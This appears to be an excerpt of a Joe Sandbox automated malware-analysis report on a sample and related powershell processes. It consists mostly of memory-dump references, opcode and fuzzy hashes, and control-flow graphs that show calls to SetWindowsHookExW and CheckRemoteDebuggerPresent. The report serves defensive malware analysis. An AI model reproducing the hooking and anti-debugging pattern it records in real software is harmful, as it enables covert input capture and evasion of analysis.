                                      • Opcode ID: 3036e7319dd46169c58389533f763d8affc3bb9901b4b94dcc6127fd7c613b32
                                      • Instruction ID: 061c3aadabf987a618252e298070039ce5e9c8dccab57d4c66e075c245701550
                                      • Opcode Fuzzy Hash: 3036e7319dd46169c58389533f763d8affc3bb9901b4b94dcc6127fd7c613b32
                                      • Instruction Fuzzy Hash: 87510231A0D7884FD72ADBAC9869AED7FE0EF56210F1901BFD0DAC71A3CA245906C751

                                      Control-flow Graph

                                      control_flow_graph 641 7ffd9b7e9d98-7ffd9b7e9d9f 642 7ffd9b7e9daa-7ffd9b7e9e1d 641->642 643 7ffd9b7e9da1-7ffd9b7e9da9 641->643 646 7ffd9b7e9ea9-7ffd9b7e9ead 642->646 647 7ffd9b7e9e23-7ffd9b7e9e28 642->647 643->642 648 7ffd9b7e9e32-7ffd9b7e9e6f SetWindowsHookExW 646->648 649 7ffd9b7e9e2f-7ffd9b7e9e30 647->649 650 7ffd9b7e9e77-7ffd9b7e9ea8 648->650 651 7ffd9b7e9e71 648->651 649->648 651->650
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3007873823.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s3OBQLA3xR.jbxd
                                      Similarity
                                      • API ID: HookWindows
                                      • String ID:
                                      • API String ID: 2559412058-0
                                      • Opcode ID: 842f70dd0834d7e78134a711fbcd2aa522833ba3810b79f04c5c7d43d26e88b3
                                      • Instruction ID: 5877927b7ed34ff0835772df9cd3484bf365a68c4ebb14cdce39b0260507909e
                                      • Opcode Fuzzy Hash: 842f70dd0834d7e78134a711fbcd2aa522833ba3810b79f04c5c7d43d26e88b3
                                      • Instruction Fuzzy Hash: 78310A31A1CA5D4FDB18DB58985A6F97BE1EF59311F00427ED05DC32A2CE75A812C7C1

                                      Control-flow Graph

                                      control_flow_graph 654 7ffd9b7e7a51-7ffd9b7e7b0d CheckRemoteDebuggerPresent 657 7ffd9b7e7b15-7ffd9b7e7b58 654->657 658 7ffd9b7e7b0f 654->658 658->657
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3007873823.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s3OBQLA3xR.jbxd
                                      Similarity
                                      • API ID: CheckDebuggerPresentRemote
                                      • String ID:
                                      • API String ID: 3662101638-0
                                      • Opcode ID: 64ee16dbabdf862225e120b21734f0c90bd0d9db5d605242696905de0defcfbd
                                      • Instruction ID: 5153c73b99fb85cbf91668ef846d4f456cfad1d8ecc3d8e28004011ee36cf4a4
                                      • Opcode Fuzzy Hash: 64ee16dbabdf862225e120b21734f0c90bd0d9db5d605242696905de0defcfbd
                                      • Instruction Fuzzy Hash: 2B31D3319087588FCB58DF58C88A7E97BF0EF65311F0542AED489D7292DB34A846CB91
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1794559565.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: da0d62bfacf0767b3d62d092a8981471cb7872f374753c84cfea2b4141bb61a7
                                      • Instruction ID: 16cea8951296bd7067df64b114b3bf609fc815e0c038539ebd8f3db98089f8a9
                                      • Opcode Fuzzy Hash: da0d62bfacf0767b3d62d092a8981471cb7872f374753c84cfea2b4141bb61a7
                                      • Instruction Fuzzy Hash: 3BD17130B18A4D8FDF94EF58C455AAD7BE1FF68300F1542AAD449D72A6CA34E841CBC1
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1794955565.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b8c0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 194b7ffdaf5d3bfb00401001df2a517e44cde71c8afdd75c1aa5723bbeb958e1
                                      • Instruction ID: 8fc2ee4912e4c6494e009ea4ffc067d3f422e97feda26251617632c3775de10d
                                      • Opcode Fuzzy Hash: 194b7ffdaf5d3bfb00401001df2a517e44cde71c8afdd75c1aa5723bbeb958e1
                                      • Instruction Fuzzy Hash: 91C167B2B0FA8E4FEB65EB6888649B57BD1EF69310B0901FFD45DC70E3D918A8058341
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1794559565.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fba4fbb7ba4127c7f75986453d4152b543fdf33e745eaa47a1904c555efebf86
                                      • Instruction ID: 8e848fc628179b38dda45694cfb201f69b9c3586c80d90c4ead7b2cf19878e5a
                                      • Opcode Fuzzy Hash: fba4fbb7ba4127c7f75986453d4152b543fdf33e745eaa47a1904c555efebf86
                                      • Instruction Fuzzy Hash: 16516023F0B79A0FD711EB6DA87A4E53FB0EF51669B0942B3C0D84A0B3FD05255646C5
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1794559565.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 19b571a1d1b1b7dcd60ccd6e47a69867ff30c6915934733982a803b7fc8a0e6e
                                      • Instruction ID: 994f9b132038e0e048d84fecee41090c7bec30d1a8c57844e11d17efd82f0372
                                      • Opcode Fuzzy Hash: 19b571a1d1b1b7dcd60ccd6e47a69867ff30c6915934733982a803b7fc8a0e6e
                                      • Instruction Fuzzy Hash: FE411B31A0DB4C4FDB589F5C980A6B9BBE0FB95711F14822FE449C3262DA20E915CBC6
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1794148959.00007FFD9B6DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6DD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b6dd000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3ba9bd9417b613bde48bb229120606bb90388cd7aea5060a94a89a6cd0813334
                                      • Instruction ID: f2cbd2f43c22ef509b472b1af15cd5ae24fb58c762ef9cceaa31cd9b52860905
                                      • Opcode Fuzzy Hash: 3ba9bd9417b613bde48bb229120606bb90388cd7aea5060a94a89a6cd0813334
                                      • Instruction Fuzzy Hash: 8041E77150EBC44FEB668B299C559623FB0EF52314B1706EFD0C8CB1A3D625B846C792
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1794559565.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 63f024787d56bd826855ee31cd86614c67e09e0b03a16c5541d096be4f5a2123
                                      • Instruction ID: 53c277f7a13e31bd47e3a5e49e1bb99c47199a372af31d79fbed6a142da36ff3
                                      • Opcode Fuzzy Hash: 63f024787d56bd826855ee31cd86614c67e09e0b03a16c5541d096be4f5a2123
                                      • Instruction Fuzzy Hash: 96210A31A0C74C4FEB59DFAC984A7E97FF0EB96321F04426BD048C3166DA74A41ACB91
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1794559565.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                      • Instruction ID: f015c6d8f1291ae9f9a84129c24d6f916cfece872e45c549876b83854877da12
                                      • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                      • Instruction Fuzzy Hash: D001A73020CB0C4FD748EF0CE051AA5B7E0FF85360F10056DE58AC36A1DA32E882CB45
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1794955565.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b8c0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 34f0b6fd2eac7a139f3a2e79696c626e4fce49e3ed08d0a52e25fce513fc9b67
                                      • Instruction ID: 40277f06f6bfad94709ab727ddca0159e156ec25e686d22428e4edf40cf004b7
                                      • Opcode Fuzzy Hash: 34f0b6fd2eac7a139f3a2e79696c626e4fce49e3ed08d0a52e25fce513fc9b67
                                      • Instruction Fuzzy Hash: 18F03A72B0E5498FD769EB5CE4518A873E0EF5932071A00BBE1ADC75B7DA25EC81C740
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1794955565.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b8c0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1c9d01475077eb56fb495711a00b000bfe71ebd68553ff63d53bd0a6d100c56f
                                      • Instruction ID: db321727d61d726b1a500bfc178e059f95f7e9a0ad87cd145831165e524c1636
                                      • Opcode Fuzzy Hash: 1c9d01475077eb56fb495711a00b000bfe71ebd68553ff63d53bd0a6d100c56f
                                      • Instruction Fuzzy Hash: B1F05E72A0E5498FDB64EB5CE4618A877E0FF4932475A00BBE159CB4A3DA25EC80C750
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1794955565.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b8c0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                      • Instruction ID: 19611bf992d818319ffca05ef679498bf87821be3afbc0c8495d4bacff4bf068
                                      • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                      • Instruction Fuzzy Hash: DCE0E531B0C8088FDA78EB4CE0519A973E1EB9832171611ABD18EC7562CA22ED918B80
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1794559565.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: L_^4$L_^7$L_^F$L_^J
                                      • API String ID: 0-3225005683
                                      • Opcode ID: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                      • Instruction ID: 04a69f08816bc91c8d325c6fadc50cdf1a4162b35631b59aac8caa5ed48679d6
                                      • Opcode Fuzzy Hash: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                      • Instruction Fuzzy Hash: 022126BBB081654ED305BBBDB8199ED3750CFD423935692F2D2A98B093EE147086CAD0
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1880506771.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ffd9b800000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e02ca464ea7ae6de21d61a294f11e71a5686d504ea3fd24b06289f8e9f2e65a4
                                      • Instruction ID: 037ac1ab26722afa81261195cb9ffc3c99e142d309db7c23176f4f59250f5e45
                                      • Opcode Fuzzy Hash: e02ca464ea7ae6de21d61a294f11e71a5686d504ea3fd24b06289f8e9f2e65a4
                                      • Instruction Fuzzy Hash: 3DD19070A08A4D8FDF98DF58C465AED7BE1FF68340F15416AD44DD72A6CA34E841CB80
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1881099198.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ffd9b8d0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5c4f31061658f036eac80b3e5a1deb50c2d3afdb13a21f7ba8942525da38899a
                                      • Instruction ID: 147502fca2da8507c0200f77d821493a0b624a1664ca5e623cbb977bdc2df6e7
                                      • Opcode Fuzzy Hash: 5c4f31061658f036eac80b3e5a1deb50c2d3afdb13a21f7ba8942525da38899a
                                      • Instruction Fuzzy Hash: CAD13672B0FACE4FEB659B6898655A57BE0EF9A214B0903FFD44CC70E3D918A905C341
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1879869254.00007FFD9B6ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6ED000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ffd9b6ed000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8b9577c27cec7504327d6cd5f36fd87dc7ab4a1f30b6391635785f8d4775a714
                                      • Instruction ID: ef10acf341b012d2ed82b7ef5ce01f43dbd18ae974b7a23ba5e75c3e4b294668
                                      • Opcode Fuzzy Hash: 8b9577c27cec7504327d6cd5f36fd87dc7ab4a1f30b6391635785f8d4775a714
                                      • Instruction Fuzzy Hash: 7B41177140EBC44FD7A6DB289851A523FF0EF56320B1A05DFD0D8CB1A3D629A856C792
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1880506771.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ffd9b800000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4a02f5ce42f4480a829912836bb1478de0265daf31d4b0e8bbd8ef8766e597cf
                                      • Instruction ID: cc77904cff0ecdd33aa5ca95062731f7025171843344ccfe95202e978c4b8e94
                                      • Opcode Fuzzy Hash: 4a02f5ce42f4480a829912836bb1478de0265daf31d4b0e8bbd8ef8766e597cf
                                      • Instruction Fuzzy Hash: 8C21E93190CB4C4FDB59DBAC984A6E97BF0EB96321F04416BD048C7162D674A45ACB91
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1880506771.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ffd9b800000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                      • Instruction ID: 2b13d53e025c2be8e90647bd55e6abaa926a26a99d8691448afac0a98a8ed019
                                      • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                      • Instruction Fuzzy Hash: A001A73021CB0D4FD748EF0CE051AA6B3E0FF89360F10056DE58AC36A1DA32E882CB41
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1881099198.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ffd9b8d0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e4478d499bf9b3dfd3fdd36072630ef3bee4ba658ad4c747b6b1c5d84f8e558e
                                      • Instruction ID: 4cecb3fe9d83812d625a24e303b298f06e34d71d7bbc9804dfad11f6b84e9ba6
                                      • Opcode Fuzzy Hash: e4478d499bf9b3dfd3fdd36072630ef3bee4ba658ad4c747b6b1c5d84f8e558e
                                      • Instruction Fuzzy Hash: C6F03A32B0E5498FDB69EB5CE4518A873E0EF99320B1A01BBE16DC75B7DA25EC41C740
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1881099198.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ffd9b8d0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7440e0b304185bed9c53a386fc529318170c296b5ecd6a9ce369f67be978bc91
                                      • Instruction ID: 6d7d4e06dda73e199b4d5e8ed5ea7773aea52152ad03b0648cb777e9397f505b
                                      • Opcode Fuzzy Hash: 7440e0b304185bed9c53a386fc529318170c296b5ecd6a9ce369f67be978bc91
                                      • Instruction Fuzzy Hash: A9F0BE32A0E5498FDB64EB5CE0648A873E0FF4932070A01BBE059CB0A3DA25AC80C740
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1881099198.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ffd9b8d0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                      • Instruction ID: 7088ed3d6d6b9d5ea87a478394cc45f134a04600c237e2e00915a735f27c0c4b
                                      • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                      • Instruction Fuzzy Hash: 07E01A31B0C8089FDB78DB4CE0519A973E1EB98331B1602BBD14EC7571CA22ED518B80
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1880506771.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ffd9b800000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: K_^4$K_^5$K_^@$K_^N$K_^U$K_^Y
                                      • API String ID: 0-4293504607
                                      • Opcode ID: 3fd38f493abf8ce8ba33fa036faf8b24e7950b6981b1504f784adbaec5ce111a
                                      • Instruction ID: 39debd1757804db3e97563aba3e1b84bbce0da434c3ed87857006a438589be37
                                      • Opcode Fuzzy Hash: 3fd38f493abf8ce8ba33fa036faf8b24e7950b6981b1504f784adbaec5ce111a
                                      • Instruction Fuzzy Hash: 6831137BB0952A1ED715B6BCB8A55EC67A0DFD437A35683F7D198CB093CC2460CB8680
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1880506771.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ffd9b800000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: K_^$K_^$K_^$K_^$K_^
                                      • API String ID: 0-4077390204
                                      • Opcode ID: d177b9602deac1fd050b3a5f9405414611bb0a5dbb74a33a2448af149b8b7d7f
                                      • Instruction ID: ec30e71d5c547b23bdb31f6cbf41ca2c868668e4b1760266469aa0d90de5f175
                                      • Opcode Fuzzy Hash: d177b9602deac1fd050b3a5f9405414611bb0a5dbb74a33a2448af149b8b7d7f
                                      • Instruction Fuzzy Hash: 5531A6A3B0F5C61FFB6A476948654D57FA0FF6579830A43F6C0D48A4A3EC0469835252
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2029665810.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ffd9b8a0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b8e639ea4c3444b00dc016b3446c3697c323248cd551818c395ec26ecbf24271
                                      • Instruction ID: bcecce17065d527f8600b539d35eb0b01543598bc4f299b4a49b8445daff318f
                                      • Opcode Fuzzy Hash: b8e639ea4c3444b00dc016b3446c3697c323248cd551818c395ec26ecbf24271
                                      • Instruction Fuzzy Hash: 54C16972F0FA8E4FEBA5DBA888645B9BBD0EF19314B0901BED45CC70EBD914A804C351
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2029665810.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ffd9b8a0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a4e1e518066d86f3f64fb2f1315968c60b0208f94122d92ed624791c9344ce0a
                                      • Instruction ID: 4cba30c8bd866edabe71d61e59cf0102e0ff5d57166eee933ef0668c622183da
                                      • Opcode Fuzzy Hash: a4e1e518066d86f3f64fb2f1315968c60b0208f94122d92ed624791c9344ce0a
                                      • Instruction Fuzzy Hash: E3812B32B0FA8D4FEB66976854355B47BD0EF5A320B0E01FED05DC71A3DA14AD068361
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2028433022.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ffd9b7d0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bb9866babb108551adfedc33b9e9538d6fcb2739b295e67c55343a63af1b7b85
                                      • Instruction ID: 3bab83c082ccb265706731372ba10aba16842314f89e70d22bcc176d92d5d35e
                                      • Opcode Fuzzy Hash: bb9866babb108551adfedc33b9e9538d6fcb2739b295e67c55343a63af1b7b85
                                      • Instruction Fuzzy Hash: E6717077B0A79A4FD7129BEC9CB50E53BA0EF5126970601B7C598CB073FE14161B8782
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2029665810.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ffd9b8a0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f382902c67746696f43a811736a22b38f3ec0bd84fb32c21f91ca568cce9d563
                                      • Instruction ID: 6b899ef3b19810da466abf7108cdaf456e705129a9508a77beb421c13796c2b5
                                      • Opcode Fuzzy Hash: f382902c67746696f43a811736a22b38f3ec0bd84fb32c21f91ca568cce9d563
                                      • Instruction Fuzzy Hash: 99511732B0EA8A4FEBA99B6C54626B47BD1EF98210B1E00BEC15DC71A3DE15EC058351
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2028433022.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ffd9b7d0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8c82f8fdc6436dce8449d7b611898aec911c65e05128a82c707a1ea3e3eeb7d5
                                      • Instruction ID: b2eacca444722a3cbffadff7df67ca6a1ce159a172efae9fbafac444a50c6d63
                                      • Opcode Fuzzy Hash: 8c82f8fdc6436dce8449d7b611898aec911c65e05128a82c707a1ea3e3eeb7d5
                                      • Instruction Fuzzy Hash: 51411E71A0DB884FDB589F5C9C1A6B87BE0FB95311F40426FE049D3262DB20B915C7C6
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2028433022.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ffd9b7d0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b898bb2ea6044092df81b2ead5f1799ea49f7bd889f4ebe42e852bdc5f65f544
                                      • Instruction ID: 665f81c7eb64d77e9249e0dcb66d471f67d5c00763ad279197f9e7691df89562
                                      • Opcode Fuzzy Hash: b898bb2ea6044092df81b2ead5f1799ea49f7bd889f4ebe42e852bdc5f65f544
                                      • Instruction Fuzzy Hash: B6415B72B0AB8A4FC3129BAC9CA90E53BA0FF513A570601B7D199C7073FF680656C781
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2027392184.00007FFD9B6BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6BD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ffd9b6bd000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f3c190ec311385bc96cdb1d0a7bf069b3d7ba8cbd989d2fae7983ebf5e10e4c4
                                      • Instruction ID: 9f1817dfec31dd77ebae0837860347710e141562923803bcb0b606205bbdfc2f
                                      • Opcode Fuzzy Hash: f3c190ec311385bc96cdb1d0a7bf069b3d7ba8cbd989d2fae7983ebf5e10e4c4
                                      • Instruction Fuzzy Hash: 3A41137140EBC44FD7668B2998519523FF0EF53320B1A05EFD088CB1A3D624A846CBA2
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2028433022.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ffd9b7d0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b173b59e0cb1293cbaa4cdd5204e4e8836f14fd6f7db779c23b2d022e33117ea
                                      • Instruction ID: bfc51b525eebe42b6118fd2aa3e78c2e96d65ee18ebed6efc70710bbac953c0e
                                      • Opcode Fuzzy Hash: b173b59e0cb1293cbaa4cdd5204e4e8836f14fd6f7db779c23b2d022e33117ea
                                      • Instruction Fuzzy Hash: ED21EA3191CB4C4FDB58DF9C984A7E97BE0EB96331F04826FD049C7166D670584ACB91
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2029665810.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ffd9b8a0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 565988bee3756961e52bd7ca86f76bcff9f25d416c990eef7028a485d323d670
                                      • Instruction ID: a2884af98bb57d04a1d788f9c1a3d2b81da599698082da621103a4bf7bc708c5
                                      • Opcode Fuzzy Hash: 565988bee3756961e52bd7ca86f76bcff9f25d416c990eef7028a485d323d670
                                      • Instruction Fuzzy Hash: 5021C123B0FA8B4FEBB9DB5844625746AD1EF68210B5E00BED05EC71F2DE18ED058351
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2029665810.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ffd9b8a0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 996c042fb07241ad1a8206bd613449a26803cc40f8a1888eb34235dc68d69046
                                      • Instruction ID: b89f5f0933814cbe5e3e5977de24bd6e6c58d5102b3e6db767c7017036cb1caa
                                      • Opcode Fuzzy Hash: 996c042fb07241ad1a8206bd613449a26803cc40f8a1888eb34235dc68d69046
                                      • Instruction Fuzzy Hash: 1C11A032B0F5494FEBB5E75894709B876D1EF4832074A00BAE56DC75A2DA19BD018360
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.2028433022.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
